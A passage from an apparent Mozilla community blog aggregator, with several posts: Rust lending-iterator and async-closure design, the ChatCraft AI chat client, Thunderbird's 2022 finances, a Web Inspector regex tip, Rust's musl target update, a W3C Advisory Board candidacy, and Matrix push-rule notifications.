In a case like this, Rust’s distinctions are expressing inherent complexity4. If you want to have a shared buffer that you reuse between calls, Java makes it easy to make mistakes. Rust’s ownership rules force you to copy out data that you want to keep using, preventing bugs like the one above. Eventually people learn to adopt functional patterns or to clone data instead of sharing access to mutable state. But that requires time and experience, and the compiler and language aren’t helping you do so (unless you use, say, Haskell or OCaml or some other functional language). These kinds of patterns are a good example of why Rust code winds up having that “if it compiles, it works” feeling, and how the same machinery that guarantees memory safety also prevents logical bugs.

Iterator as a special case of LendingIterator

OK, so we saw that the Iterator and LendingIterator trait, while clearly related, express an important tradeoff. The Iterator trait declares up front that each Item is independent from the iterator, but the LendingIterator declares that the Item<'_> values returned may be borrowed from the iterator. This affects what fully generic code (like our take_two function) can do.

But note a careful hedge: I said that the LendingIterator trait declares that Item<'_> values may be borrowed from the iterator. They don’t have to be. In fact, every Iterator can be viewed as a LendingIterator (as you can see in this playground), much like every Fn (which takes an &self) can be viewed as an FnMut (which takes an &mut self). Essentially an Iterator is “just” a LendingIterator that doesn’t happen to make use of the 'a argument when defining its Item<'a>.
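That embedding can be written as a blanket impl. This is a sketch along the lines of the linked playground (the LendingIterator definition is repeated from above so the snippet is self-contained):

```rust
trait LendingIterator {
    type Item<'a>
    where
        Self: 'a;
    fn next(&mut self) -> Option<Self::Item<'_>>;
}

// Every giving `Iterator` is a `LendingIterator` that simply ignores
// the lifetime parameter when defining its `Item<'a>`.
impl<I: Iterator> LendingIterator for I {
    type Item<'a> = I::Item
    where
        Self: 'a;

    fn next(&mut self) -> Option<Self::Item<'_>> {
        // Defer to the giving trait; the item is independent of `self`.
        Iterator::next(self)
    }
}
```

Because I::Item never mentions 'a, callers get back owned values, exactly as with the plain Iterator trait.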

It’s also possible to write a version of take_two that uses LendingIterator but compiles (playground)5:

fn take_two_v3<T, U>(t: &mut T) -> Option<(U, U)> 
where
    T: for<'a> LendingIterator<Item<'a> = U>
    // ^^^^^^                             ^
    // No matter which `'a` is used, result is always `U`,
    // which cannot reference `'a` (after all, `'a` is not
    // in scope when `U` is declared).
{
    let Some(i) = t.next() else { return None };
    let Some(j) = t.next() else { return None };
    Some((i, j))
}

The key here is the where-clause. It says that T::Item<'a> is always equal to U, no matter what 'a is. In other words, the item that is produced by this iterator is never borrowed from self – if it were, then its type would include 'a somewhere, as that is the lifetime of the reference to the iterator. As a result, take_two compiles successfully. Of course, it also can’t be used with LendingIterator values that actually make use of the flexibility the trait is offering them.

Can we “unify” Iterator and LendingIterator?

The fact that every iterator is just a special case of lending iterator raises the question: can they be unified? Jack Huey, in the runup to GATs, spent a while exploring this question, and concluded that it doesn’t work. To see why, imagine that we changed Iterator so that it had type Item<'a>, instead of just type Item. It’s easy enough to imagine that existing code that says T: Iterator<Item = u32> could be reinterpreted as for<'a> T: Iterator<Item<'a> = u32>, and then it ought to continue compiling. But the scheme doesn’t quite work, precisely because of examples like take_two_v1:

fn take_two_v1<T: Iterator>(t: &mut T) -> Option<(T::Item, T::Item)> {...}

This signature just says that it takes an Iterator; it doesn’t put any additional constraints on it. If we’ve modified Iterator to be a lending iterator, then you can’t take two items independently. So we would have to have some way to say “any giving iterator” vs “any lending iterator” – and if we’re going to say those two things, why not make it two distinct traits?

FnMut is a giving trait

I started off this post talking about async closures, but so far I’ve just talked about iterators. What’s the connection? Well, for starters, the distinction between sync and async closures is precisely the difference between giving and lending closures.

Sync closures (at least as defined now) use giving traits. Consider a (simplified) view of the FnMut trait as an example:

trait FnMut<A> {
    type Output;
    fn call(&mut self, args: A) -> Self::Output;
    //      ^                      ^^^^^^^^^^^^
    // The `self` reference is independent from the
    // return type.
}

FnMut returns a Self::Output, just like the giving Iterator returns Self::Item.

FnMut has special syntax

You may not be accustomed to seeing the FnMut trait as a regular trait. In fact, on stable Rust, we require you to use special syntax with FnMut. For example, you write impl FnMut(u32) -> bool as a shorthand for FnMut<(u32,), Output = bool>. This is not just for convenience, it’s also because we have planned for some time to make changes to the FnMut trait (e.g., to make it variadic, rather than having it take a tuple of argument types), and the special syntax is meant to leave room for that. Pay attention here: this special syntax turns out to have an important role.

Async closures are a lending pattern

Async closures are closures that return a future. But that future has to capture self. So that makes them a kind of lending trait. Imagine we had a LendingFnMut:

trait LendingFnMut<A> {
    type Output<'this>
    where
        Self: 'this;
    
    fn call(&mut self, args: A) -> Self::Output<'_>;
    //      ^                                  ^^^^
    // Lends data from `self` as part of return value.
}

Now we could (not saying we should) express an async closure as a kind of bound on Output:

// Imagine we want something like this...
async fn foo(f: async FnMut() -> bool) {...}

// ...that is kind of this:
async fn foo<F>(f: F)
where
    F: LendingFnMut<()>,
    for<'a> F::Output<'a>: Future<Output = bool>
{
    ...
}

What is going on here? We are saying first that f is a lending closure that takes no arguments (F: LendingFnMut<()>). Note that we are not using the special FnMut sugar here, so this constraint says nothing about the value of Output. Then, in the next where-clause, we are specifying that Output implements Future<Output = bool>. Importantly, we never say what F::Output is, just that it will implement Future. This means that it could include references to self (but it doesn’t have to).
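For contrast, here is what stable Rust permits today with the giving FnMut. The names (call_twice) are invented for illustration; the point is that the returned future is fully independent of the closure, so two futures can coexist:

```rust
use std::future::Future;

// Sketch: with today's *giving* `FnMut`, the closure hands back a
// future that does not borrow from the closure's own state, so we
// may create a second future while the first is still alive.
async fn call_twice<F, Fut>(mut f: F) -> (bool, bool)
where
    F: FnMut() -> Fut,          // giving: `Fut` is independent of `f`
    Fut: Future<Output = bool>,
{
    let first = f();  // future #1
    let second = f(); // future #2, created while #1 is still live
    (first.await, second.await)
}
```

An async closure whose future borrowed the closure’s captured state could not satisfy this bound; that is exactly the lending case that a LendingFnMut-style formulation is designed to admit.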

Note what just happened. This is effectively a “third option” for how to desugar some kinds of async closures. In my previous post, I talked about using HKT and about transforming the FnMut trait into an async variant (async FnMut). But here we see that we could also have a lending variant of the trait and then bound the Output of that to implement Future.

Closure syntax gives us more room to maneuver

So, to recap things we have seen:

  • Giving vs lending traits is a fundamental pattern:
    • A giving trait has a return value that never borrows from self
    • A lending trait has a return value that may borrow from self
  • Giving traits are subtraits of lending traits; i.e., you can view a giving trait as a lending trait that happens not to lend.
  • We can’t convert Iterator to a lending trait “in place”, because functions that are generic over T: Iterator rely on it being the giving pattern.
  • Async closures are expressible using a lending variant of FnMut, but not the current trait, which is the giving version.

Given the last two points, it might seem logical that we also can’t convert FnMut “in place” to the lending version, and that therefore we have to add some kind of separate trait. In fact, though, this is not true, and the reason is the forced closure syntax. In particular, it’s not possible to write a function today that is generic over F: FnMut<A> but doesn’t specify a specific value for the Output generic type. When you write F: FnMut(u32), you are actually specifying F: FnMut<(u32,), Output = ()>. It is possible to write generic code that talks about F::Output, but that will always be normalizable to something else, because adding the FnMut bound always includes a value for Output.

In principle, then, we could redefine the Output associated type to take a lifetime parameter and change the desugaring for F: FnMut() -> R to be for<'a> F: FnMut<(), Output<'a> = R>. We would also have to make F::Output be legal even without specifying a value for its lifetime parameter; there are a few ways we could do that.

How to interpret impl Trait in the value of an associated type

Let’s imagine, then, that we changed the Fn* traits to be lending. That’s still not enough to support our original goal:

fn take_closure(x: impl FnMut() -> impl Future<Output = bool>) { }
//                                 ^^^^
// Impl trait is not supported here.

The problem is that we also have to decide how to desugar impl Trait in this position. The interpretation that we want is not entirely obvious. We could choose to desugar -> impl Future as a bound on the Output type, i.e., to this:

fn take_closure<F>(x: F) 
where
    F: FnMut<()>,
    for<'a> <F as FnMut<()>>::Output<'a>: Future<Output = bool>
{ }

If we did this, then the Output value is permitted to capture 'a, and hence we are taking advantage of FnMut being a lending closure. This means that, when we call the closure, we have to await the resulting future before we can call again, just like we wanted.

Complications

Interpreting impl Trait this way is a bit tricky. For one thing, it seems inconsistent with how we interpret impl Trait in a parameter like impl Iterator<Item = impl Debug>. Today, that desugars to two fresh parameters <F, G> where F: Iterator<Item = G>, G: Debug. We could probably change that without breaking real world code, since if the associated type is not a GAT I don’t think it matters, but we also permit things like impl Iterator<Item = (impl Debug, impl Debug)> that cannot be expressed as bounds. RFC #2289 proposed a new syntax for these sorts of bounds, such that one would write F: Iterator<Item: Debug> to express the same thing. By analogy, one could imagine writing F: FnMut(): Future<Output = bool>, but that’s not consistent with the -> impl Future that we see elsewhere. It feels like there’s a bit of a tangle of string to sort out here if we try to go down this road, and I worry about winding up with something that is very confusing for end-users (too many subtle variations).

Conclusion

To recap all the points made in this post:

  • Giving vs lending traits is a fundamental pattern:
    • A giving trait has a return value that never borrows from self
    • A lending trait has a return value that may borrow from self
  • Giving traits are subtraits of lending traits; i.e., you can view a giving trait as a lending trait that happens not to lend.
  • We can’t convert Iterator to a lending trait “in place”, because functions that are generic over T: Iterator rely on it being the giving pattern.
  • Async closures are expressible using a lending variant of FnMut, but not the current trait, which is the giving version.
  • It is possible to modify the Fn* traits to be “lending” by changing how we desugar F: Fn, but we have to make it possible to write F::Output even when Output has a lifetime parameter (perhaps only if that parameter is statically known not to be used).
  • We’d also have to interpret FnMut() -> impl Future as being a bound on a possibly lent return type, which would be somewhat inconsistent with how Foo<Bar = impl Trait> is interpreted now (which is as a fresh type).

Hat tip

Tip of the hat to Tyler Mandry – this post is basically a summary of a conversation we had.

Footnotes

  1. There is a subtle point here. If you are iterating over, say, a &[T] value, then the Item you get back is an &T and hence borrowed. It may seem strange for me to say that you get ownership of the &T. The key point here is that the &T is borrowed from the collection you are iterating over and not from the iterator itself. In other words, from the point of view of the Iterator, it is copying out a &T reference and handing ownership of the reference to you. Owning the reference does not give you ownership of the data it refers to. 

  2. Sometimes called “streaming” iterators. 

  3. Not to mention that GATs remain in an “MVP” state that is rather unergonomic to use; we’re working on it! 

  4. Of course, Rust’s notations for expressing these distinctions involve some “accidental complexity” of their own, and you might argue that the cure is worse than the disease. Fair enough. 

  5. This example, by the way, demonstrates the unergonomic state of GAT support. I don’t love writing for<'a> all the time. 

Mozilla Accessibility: Firefox 113 Significantly Boosts Accessibility Performance

The post Firefox 113 Significantly Boosts Accessibility Performance appeared first on Mozilla Accessibility.

David Humphrey: ChatCraft.org

I've been continuing my experiments with AI development.  I wrote previously about my attempts to use ChatGPT more intentionally, as a way to better understand how my students are encountering it.  Since then, I've been focusing on contributing to https://chatcraft.org/ and wanted to talk about what it is and what it's been like to build it.

My recent AI posts prompted an old friend from my Mozilla days (Taras Glek) to reach out on Twitter.  He wanted to talk about our shared interest in AI and programming.  Both of us learned to program long before AI, but we also see the tremendous potential of using AI to accelerate our work going forward.  We've also been finding that many of our colleagues and peers aren't as interested as we are, and having someone else to talk to and work with on this stuff has been important.

Taras wanted to show me an experiment he'd been building to create his own open source, programming-focused, ChatGPT web client.  It already had a lot of cool features like being able to render Mermaid diagrams and HTML in responses from the ChatGPT API.  He'd also hooked up langchainjs, which is a project I've been following with interest.

Seeing a pure browser-based web app (no server-side code) really inspired me.  For some reason, all of my AI work thus far has been done using two-tier web apps or with node.js all on the server.  I don't know why it never occurred to me to do all of this in the browser.  Seeing what Taras was doing, it all suddenly clicked for me: I really want my AI to be in the browser.

Before this, I was using various AI Assistants in VSCode to see what that's like.  I've tried Cody from Sourcegraph, Amazon CodeWhisperer, and a few more.  So far this process has convinced me that what I really want is the ability to reason with, and explore ideas in code with an AI vs. having it dump suggestions in my editor.  I love having this be a browser tab vs. an editor extension.

Like me, Taras had started using GPT via the OpenAI Playground.  We both loved it.  You could try things in a web page, use it or delete it, and keep trying again until you were happy. It was so easy to experiment.  The ephemeral nature of the output (nothing being saved, not integrated with anything you're working on) encouraged playfulness and exploration. Then OpenAI brought out ChatGPT.  I don't need to tell you what it is.  Again, the "it's just a website" phenomenon really struck me.

Rather than give up on his own UI and use ChatGPT, Taras kept going with what he was building.  He wanted to know if I'd help him with the UI.  It felt like old times, when I was building DXR (a web UI) on top of his Dehydra gcc plugins.

Since then I've been working with Taras to rebuild the UI for what's become chatcraft.org.  It's now gotten to the point that I only use it vs ChatGPT or VSCode assistants.  I like how much freedom it gives: paste in your OpenAI API key and you're ready to go.  No logins, no annoying rate limits, and the UI and responses are tailored to what a programmer wants vs. being a general-purpose chatbot.

I've also loved being able to build it the way that makes sense to us.  I don't have to wait on OpenAI or some other company to give me what I want--I can build it myself.  The cheap and ready access we have to the underlying models, and the flexibility of the web as a UI and rendering platform is amazing.

Another unexpected benefit of having an AI-based project is that it's helped me get over the hump of using AI to program.  I don't naturally think to use AI when programming: I've never had access to one in the past, and old habits die hard.  However, writing an AI app has made it obvious that I should be using AI to build it.  I've had all kinds of help from ChatGPT and GPT-4 while writing the code.

When I'd get stumped on something, I paste in the code and start talking about my bugs.  Because I work in Markdown, it's very similar to writing issues on GitHub.  Often I get what I need back: a push in the right direction and sometimes complete code as well.  I've also been amazed at how it has been able to replace automated tests.  For example, the other day I was working on a bug in the syntax highlighting code, and I worked with ChatCraft on ChatCraft.  I'd ask it for examples of code blocks, fix the code, repeat, ask about bugs I was seeing, fix things, repeat.  Using the app as an AI-REPL is extremely productive and unlike any programming I've done before.  It's like assembling a robot with the robot's help.

I'm excited to try using it for some other AI experiments over the next few months. I have a few other collaborations I'm wanting to do with friends who are interested in AI, and I'm going to suggest we use ChatCraft to do the work.

ChatCraft.org is still pretty young, but I love it and wanted to share.  If you'd like to give it a try and contribute, please do.  Let Taras and me know what you think.

UPDATE: Taras has also written his own post about ChatCraft.

Mozilla Thunderbird: Thunderbird Is Thriving: Our 2022 Financial Report

Thunderbird Thriving! 3 stacks of increasingly higher coins, each of them sprouting a small plant.

A few years ago, Thunderbird was in survival mode. Our dedicated core team, passionate community of users, and generous donors kept Thunderbird alive during some difficult times. Then, just last May, we happily reported that Thunderbird’s financial outlook was steadily improving: our 2021 income had increased by 21% over 2020, and by more than 100% over 2018. 

But we are not content merely surviving. Our mission is to build the best email client and personal information manager available. To build professional software that puts your privacy first. To craft an experience that boosts your productivity, complements your daily workflow, and meets your customization needs. And to expand the Thunderbird experience to Android and iOS. And to do all of this transparently, guided by the values of free and open source software. 

Donations In 2022

Last year, our mighty donor base – representing approximately 300,000 daily users – contributed a total of $6,442,704 in donations to the Thunderbird project. (Note: user donations represent more than 99.9% of our annual revenue.) Our 2022 donation income was a bright, assertive sign that you also believe in that mission, and you also want to see Thunderbird thriving. Not just in 2023, but decades into the future! 

Year-to-year donations to Thunderbird: 2017 through 2022.

This is nothing short of outstanding, and we are tremendously grateful for the generous donations of our users. Below, we’ll talk about what this enables us to do in the future, and how we spent some of that income in 2022. 

Before we discuss that, you might be wondering what we did differently to generate such a significant surge of support last year. 

At the end of 2021, we decided to make a bigger investment in communicating with you. That meant more frequent blog posts and newsletters, daily engagement across our social media channels, and expanding the number of places we interact with you (like our relatively new Mastodon account). 

Donations by month, comparing 2021 and 2022.

We also attribute this amazing uplift to the release of Thunderbird 102, as well as a first-of-its-kind, in-app donation appeal at the end of the year. 

In short, we learned that projects like ours can benefit greatly from simply asking for donations, while simultaneously explaining how those donations will benefit the project – and ultimately, how they will benefit you. So let’s talk about that! 

Thunderbird’s People And Thunderbird’s Future

The heart of Thunderbird is obviously its people, and we invested heavily in personnel last year. We began 2022 with 15 core staff, and now employ a team of 24 in these roles:

  • Product and Business Development Manager
  • Director of Operations
  • Product Design Manager
  • Engineering Manager
  • Staff Engineers (3)
  • Sr SW Engineers (2)
  • Sr Security Engineer
  • SW Engineer, Add-Ons Ecosystem
  • Sr UI/UX Developer
  • UI/UX Developers (2)
  • Android Project Lead
  • Android Developer (1)
  • Build & Release Engineers (2)
  • Full Stack Developer
  • Front End Developer
  • Community Manager
  • Marketing Manager
  • Bug Triager
  • Support Engineer

The breakout growth we enjoyed last year means hiring even more talented people to vastly improve the Thunderbird desktop experience. This past year we expended significant effort to dramatically improve Thunderbird’s UX and bring it in line with modern expectations and standards. In 2022 we also laid the groundwork for large architectural changes for Thunderbird on the desktop. These changes address many years of technical debt that has limited our ability to add new features at a brisk pace. This work will largely pay off in our 2024 release, though it already powers some of the improvements in the 115 “Supernova” release this summer.

But we’re also building beyond the desktop, to provide you with a truly cross-platform, synergistic experience. Last summer we invested in the K-9 Mail Project, which is being steadily improved in its transformation to Thunderbird on Android. And yes, we’re almost ready to add an iOS version to our roadmap! Later in 2023, we’ll hire an iOS developer to begin creating the foundation for Thunderbird on iOS. 

Thunderbird is also expanding beyond the core experience you already use. We’ve been exploring additional sources of revenue in the form of new tools and services to increase your productivity. We’re planning to introduce some of these, in Beta status, later this year. Rest assured that we have no plans to charge money for the powerful Thunderbird experience you enjoy today (nor do we plan to remove features and charge for them later). 

Total Spending In 2022

The Thunderbird Project’s total operating expenses for 2022 were $3,569,706. While personnel is where most of our money is spent, there are other areas crucial to Thunderbird’s continued operation. Here’s an overview of our total spending in 2022:

A pie chart showing spending percentages for Thunderbird in 2022.

Professional Services are things like HR, legal and tax services, as well as agreements with other Mozilla entities to provide technology infrastructure and operational resources.

The remaining items help us to run the business, such as the services and technology we use to communicate and manage operations, insurance, bank and donation processing fees. 

Closing Comments

The state of Thunderbird’s finances is strong. But that doesn’t make our team complacent. We are careful stewards of the thoughtful donations we receive from you. We don’t just use them to enhance features; we invest them strategically toward ensuring the long-term stability and viability of Thunderbird. Healthy cash reserves keep Thunderbird sustainable even during periods of economic instability.

Your ongoing financial gifts have enabled Thunderbird to go from surviving to thriving. But as it has been since 2003, Thunderbird’s future is in your hands. Please continue to donate, and we will continue to build software you can be proud of. 

Thank you,

Ryan Sipes
Thunderbird Product and Business Development Manager

The post Thunderbird Is Thriving: Our 2022 Financial Report appeared first on The Thunderbird Blog.

Karl DubostWeb Inspector Search Regex

Finding the right keyword among thousands of lines of CSS, JavaScript, or HTML can be dreadful. There are solutions.

Many Buddhas sculpted in wood, all looking very similar

I was searching for navigator.userAgent on the NYTimes website. All developer tools have search features. In Safari Web Inspector, Command + Shift + F will start the search tab.

Searching for userAgent matches userAgent itself, but also:

  • isInWebViewByUserAgent
  • userAgentData
  • getUserAgent
  • userAgentIndicatesApp
  • UserAgentClientHints

I wanted to be able to reduce the search space. Let's try regex.

So I searched for \.userAgent to match only strings starting with a dot. We can't match only navigator.userAgent because someone might have assigned it to a variable. But this is not enough: I also wanted to exclude references to longer property names by rejecting any additional ASCII letters.

\.userAgent[^a-zA-Z]+

That's it.
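As a quick sanity check, the same regex can be exercised outside of Web Inspector too. This Python sketch runs it against a small invented snippet of source (the sample code below is made up for illustration):

```python
import re

# Invented sample source, mimicking the kinds of identifiers found on the page.
source = """
var ua = navigator.userAgent;
if (isInWebViewByUserAgent || navigator.userAgentData) { getUserAgent(); }
"""

# ".userAgent" must be followed by at least one non-letter, which filters out
# userAgentData, getUserAgent, and friends.
pattern = re.compile(r"\.userAgent[^a-zA-Z]+")
matches = pattern.findall(source)
print(matches)  # → ['.userAgent;\n']
```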

To access this feature you need to go to Settings in Web Inspector, then General, then check Regular Expression in the search section.

Screenshot of the Web Inspector with the regex search for UserAgent

Otsukare!

The Rust Programming Language BlogUpdating Rust's Linux musl targets

Beginning with Rust 1.71 (slated for stable release on 2023-07-13), the various *-linux-musl targets will ship with musl 1.2.3. These targets currently use musl 1.1.24. While musl 1.2.3 introduces some new features, most notably 64-bit time on all platforms, it is ABI compatible with earlier musl versions.

As such, this change is unlikely to affect you.

Updated targets

The following targets will be updated:

Target Support Tier
aarch64-unknown-linux-musl Tier 2 with Host Tools
x86_64-unknown-linux-musl Tier 2 with Host Tools
arm-unknown-linux-musleabi Tier 2
arm-unknown-linux-musleabihf Tier 2
armv5te-unknown-linux-musleabi Tier 2
armv7-unknown-linux-musleabi Tier 2
armv7-unknown-linux-musleabihf Tier 2
i586-unknown-linux-musl Tier 2
i686-unknown-linux-musl Tier 2
mips-unknown-linux-musl Tier 2
mips64-unknown-linux-muslabi64 Tier 2
mips64el-unknown-linux-muslabi64 Tier 2
mipsel-unknown-linux-musl Tier 2
hexagon-unknown-linux-musl Tier 3
mips64-openwrt-linux-musl Tier 3
powerpc-unknown-linux-musl Tier 3
powerpc64-unknown-linux-musl Tier 3
powerpc64le-unknown-linux-musl Tier 3
riscv32gc-unknown-linux-musl Tier 3
riscv64gc-unknown-linux-musl Tier 3
s390x-unknown-linux-musl Tier 3
thumbv7neon-unknown-linux-musleabihf Tier 3

Note: musl 1.2.3 does not raise the minimum required Linux kernel version for any target.

Will 64-bit time break the libc crate on 32-bit targets?

No. The musl project made this change while carefully preserving ABI compatibility. The libc crate will continue to function correctly without modification.

A future version of the libc crate will update the definitions of time-related structures and functions to be 64-bit on all musl targets; however, this is blocked on the musl targets themselves being updated first. At present there is no anticipated date for this change, and care will be taken to help the Rust ecosystem transition successfully to the updated time-related definitions.

Tantek ÇelikRunning For Re-election in the W3C Advisory Board (AB) Election

Hi, I’m Tantek Çelik and I’m running for the W3C Advisory Board (AB) to help continue transitioning W3C to a community-led, values-driven, and more effective organization. I have been participating in and contributing to W3C groups and specifications for over 25 years.

I am Mozilla’s Advisory Committee (AC) representative and have previously served on the AB for several terms, starting in 2013. In the early years I advanced the movement to offer open licensing of W3C standards, and to make W3C more responsive to the needs of independent websites and open source implementers.

At the same time I co-chaired the W3C Social Web Working Group that produced several widely interoperably deployed Social Web Standards, most notably the ActivityPub specification, which has received renewed attention as the technology behind Mastodon and other social web implementations.

In my most recent AB terms I led the AB’s Priority Project for an updated W3C Vision, drove consensus in issues & meetings, and submitted & reviewed pull requests to advance our Vision draft.

Environmental sustainability is a global concern, and the impacts of technologies, services, and standards are important for W3C to consider in all of its work, as the TAG has summarized in the W3C TAG Ethical Web Principles. To raise the importance of sustainability (s12y) at W3C, last year I established the W3C Sustainability Community Group, and subsequently organized interested participants at TPAC 2022 into asynchronous work areas, such as working on Sustainability Horizontal Reviews.

The next two years of the Advisory Board are a critical transition period, and will require experienced & active AB members to work in coordination with the TAG and the Board of Directors to establish new models and procedures for sustainable community-driven leadership and governance of W3C.

I believe governance of W3C, and advising thereof, is most effectively done by those who have the experience of actively working in W3C working groups on specifications, and especially those who directly use & create on the web using W3C standards. This direct connection to the actual work of the web and W3C is essential to prioritizing the purpose & scope of governance thereof.

I post on my personal site tantek.com. You may follow my posts there or from Mastodon: @tantek.com@tantek.com.

I have Mozilla’s financial support to spend my time pursuing these goals, and ask for your support to build the broad consensus required to achieve them.

If you have any questions or want to chat about the W3C Advisory Board, Values & Vision, or anything else W3C related, please reach out by email: tantek at mozilla.com. Thank you for your consideration. This statement is also published publicly on my blog.

Patrick ClokeMatrix Push Rules & Notifications

In a previous post about read receipts & notifications in Matrix I briefly mentioned that push rules generate notifications, but with little detail. After completing a rather large project to improve notifications in Matrix I want to fill in some of those blanks. [1]

Note

These notes are true as of the v1.6 of the Matrix spec and also cover some Matrix spec changes which may or may not have been merged since.

Push notifications in Matrix

Matrix includes a push notifications module which defines when Matrix events are considered an unread notification or highlight notification [2] and how those events are sent to third-party push notification services.

Push rules are a set of ordered rules which clients upload to the homeserver. These are shared by all devices and are evaluated per event by the homeserver (and also by clients). Default push rules are defined in the Matrix spec. Push rules power the unread (and highlight) counts for each room, push notifications, and the notifications API.

Each rule defines conditions which must be met for the rule to match and actions to take if the rule matches.

Push rules are processed in order until a rule matches or all rules have been evaluated.

Getting notifications

As some background, clients receive notifications in one of two ways, via polling /sync and/or via push notifications.

Web-based clients often receive events via polling:

Notification flow for web applications.

The sync response (both initial and incremental) includes the count of unread notifications and unread highlight notifications per room.
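For instance, a client reading those counts out of a /sync payload might do something like this sketch (the field names follow the Matrix client-server spec; the response body itself is invented):

```python
# Sketch: pulling per-room unread counts out of a /sync response.
sync_response = {
    "rooms": {
        "join": {
            "!abc:example.org": {
                "unread_notifications": {
                    "notification_count": 5,
                    "highlight_count": 1,
                },
            },
        },
    },
}

room_counts = {}
for room_id, room in sync_response["rooms"]["join"].items():
    counts = room.get("unread_notifications", {})
    room_counts[room_id] = (
        counts.get("notification_count", 0),
        counts.get("highlight_count", 0),
    )

print(room_counts)  # → {'!abc:example.org': (5, 1)}
```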

Mobile applications often receive events via push [3]:

Notification flow for mobile applications.

Push notifications include the event information (or just the event ID) and whether the event was a highlight notification. (The event being pushed implies it increased the notification count.)

Note

The deployment of the push gateway must be paired with the application (the push keys must be paired). I.e. if you make your own application (or even your own build of Element iOS / Android) you cannot re-use the deployment at matrix.org and must have your own deployment.

Getting events which generated notifications

There’s an API to retrieve a list of events which the user has been notified about. This powers the “notification panel” on Element Web and is meant to help users catch up on missed notifications.

It is fairly underspecified and the Synapse implementation has limitations:

  • Highlight notifications are only kept for 30 days
  • Non-highlight notifications are only kept for 72 hours

Additionally it works poorly for encrypted rooms.

Push rules background

Getting the configured push rules?

There’s a set of APIs to fetch or modify push rules; they let you:

  • Fetch all push rules
  • Create or delete an individual push rule
  • Fetch or update an individual push rule’s actions
  • Fetch or enable/disable an individual push rule

An initial sync includes all of a user’s push rules under the user’s account data.

Any changes to push rules are included in incremental syncs, except for rules newly added to the specification (this is likely a homeserver bug).

Note that you cannot use the account data APIs to configure push rules. [4]

What makes up a push rule?

A push rule is a JSON object with the following fields:

  • rule_id: Unique (per-user) ID for the rule.
    • The rule_id for default rules have a special form (they start with a dot: .).
  • default: Whether the rule is part of the predefined set of rules.
  • enabled: Whether the rule is enabled.
  • conditions: an array of 0 or more conditions to match.
  • actions: 0 or more actions to take if the rule matches.

All conditions must match for a push rule to match. If there are no conditions, then the push rule always matches. Possible conditions include:

  • Check event properties against patterns or exact values
    • Strings can be compared via globbing or exact values.
    • The globbing behavior changes if you’re checking the body property or not.
  • Check against the number of room members
    • Used to (incorrectly) check if a room is a direct message.
  • Check if a user can perform an action via power levels
    • The only defined option is whether a user can send @room.

Push rule actions define what to do once a push rule matches an event.

  • notify: increment the notification count and send a push notification. Uses “tweaks” to optionally:
    • Play a sound.
    • Create a highlight notification, this causes the highlight count to be incremented (in addition to the notification count).
  • The actions list can be empty to do nothing.

There are other undefined or no-op actions (dont_notify, coalesce) which will be removed in the next version of the spec. [5]
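The processing model above can be sketched in a few lines of Python. This is not a spec-complete implementation: only the event_match condition kind is handled, glob matching is approximated with fnmatch, and the rule/event values are invented for illustration.

```python
import fnmatch

def event_property(event, dotted_key):
    """Resolve a dotted key like 'content.body' against an event dict."""
    value = event
    for part in dotted_key.split("."):
        if not isinstance(value, dict):
            return None
        value = value.get(part)
    return value

def condition_matches(cond, event):
    if cond["kind"] == "event_match":
        value = event_property(event, cond["key"])
        # Real implementations use word-boundary globbing for 'content.body'
        # and whole-string globbing elsewhere; fnmatch approximates the latter.
        return isinstance(value, str) and fnmatch.fnmatchcase(value, cond["pattern"])
    return False  # other condition kinds omitted from this sketch

def evaluate(rules, event):
    """Return the actions of the first matching enabled rule, else None."""
    for rule in rules:
        if not rule.get("enabled", True):
            continue
        # An empty (or absent) conditions list means the rule always matches.
        if all(condition_matches(c, event) for c in rule.get("conditions", [])):
            return rule["actions"]
    return None

rules = [
    {
        "rule_id": "deploy-keyword",
        "enabled": True,
        "conditions": [
            {"kind": "event_match", "key": "content.body", "pattern": "*deploy*"}
        ],
        "actions": ["notify", {"set_tweak": "highlight"}],
    },
]

event = {"type": "m.room.message", "content": {"body": "ready to deploy now"}}
actions = evaluate(rules, event)
print(actions)  # → ['notify', {'set_tweak': 'highlight'}]
```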

Types of push rules

Push rules have a type associated with them, these are executed in order:

  • Override: generic high priority rules
  • Content-specific: applies to messages which have a body that matches a pattern
  • Room-specific: applies to messages of a room
  • Sender-specific: applies to messages from a sender
  • Underride: generic low priority rules

The previously discussed shape of push rules is not the full story! There are special cases which do not accept conditions, but can be mapped to them.

  • Content-specific: has a pattern field which maps to a pattern against the body property.
  • Room-specific: the rule_id is re-used to match against the room ID.
  • Sender-specific: the rule_id is re-used to match against the event sender.
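Those special cases can be mapped to equivalent conditions, roughly as in this sketch (the condition key names follow the Matrix spec; the example rules are invented):

```python
# Sketch: mapping the special-cased rule types to event_match conditions.

def content_rule_to_condition(rule):
    # Content-specific rules carry a `pattern` matched against the body.
    return {"kind": "event_match", "key": "content.body", "pattern": rule["pattern"]}

def room_rule_to_condition(rule):
    # Room-specific rules re-use the rule_id as the room ID to match.
    return {"kind": "event_match", "key": "room_id", "pattern": rule["rule_id"]}

def sender_rule_to_condition(rule):
    # Sender-specific rules re-use the rule_id as the sender to match.
    return {"kind": "event_match", "key": "sender", "pattern": rule["rule_id"]}

mute_room = {"rule_id": "!abc:example.org", "actions": []}
print(room_rule_to_condition(mute_room))
# → {'kind': 'event_match', 'key': 'room_id', 'pattern': '!abc:example.org'}
```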

Why do clients care? Doesn’t the homeserver do this all for me?

Encryption ruins everything! Some of the push rules require the decrypted event content to be properly processed. To enable this, the default rules declare all encrypted events as notifications. Clients are expected to re-run push rules on the decrypted content. [6]

This can result in one of the following: [7]

  • Increment the highlight count (the decrypted event results in a highlight)
  • No change (the decrypted event results in a notification)
  • Decrement notification counts (the decrypted event results in no notification)

Due to gappy syncs clients frequently can only make a best estimate of the true unread / highlight count of events in encrypted rooms.

Warning

Element iOS / Android get encrypted events pushed to them, but do not properly implement mentions & keywords.

What happens by default?

The default rules are in the Matrix spec and include:

  • Highlight:
    • Tombstones
    • Room & user mentions
  • Do nothing:
    • Notice messages
    • Other room member events
    • Server ACL updates
  • Notification:
    • Invites to me
    • Messages and encrypted events in non-DMs
  • Notification with sound:
    • Incoming calls
    • Messages and encrypted events in DMs

Default rules can be disabled or have their actions modified on a per-user basis. Some of the above features are handled by multiple push rules.

Other “standard” rules

Element creates custom push rules based on a known form. [8]

  • Keywords (implemented as a content-specific rule with a pattern)
  • Per-room overrides:
    • All messages (implemented as a room-specific rule with a notify action)
    • Mentions & keywords (implemented as a room-specific rule with no actions)
    • Mute (implemented as an override rule to match the room ID with no actions)

Matrix also allows defining arbitrary rules (e.g. to change behavior for particular rooms, senders, message types, etc.)

What about unread rooms?

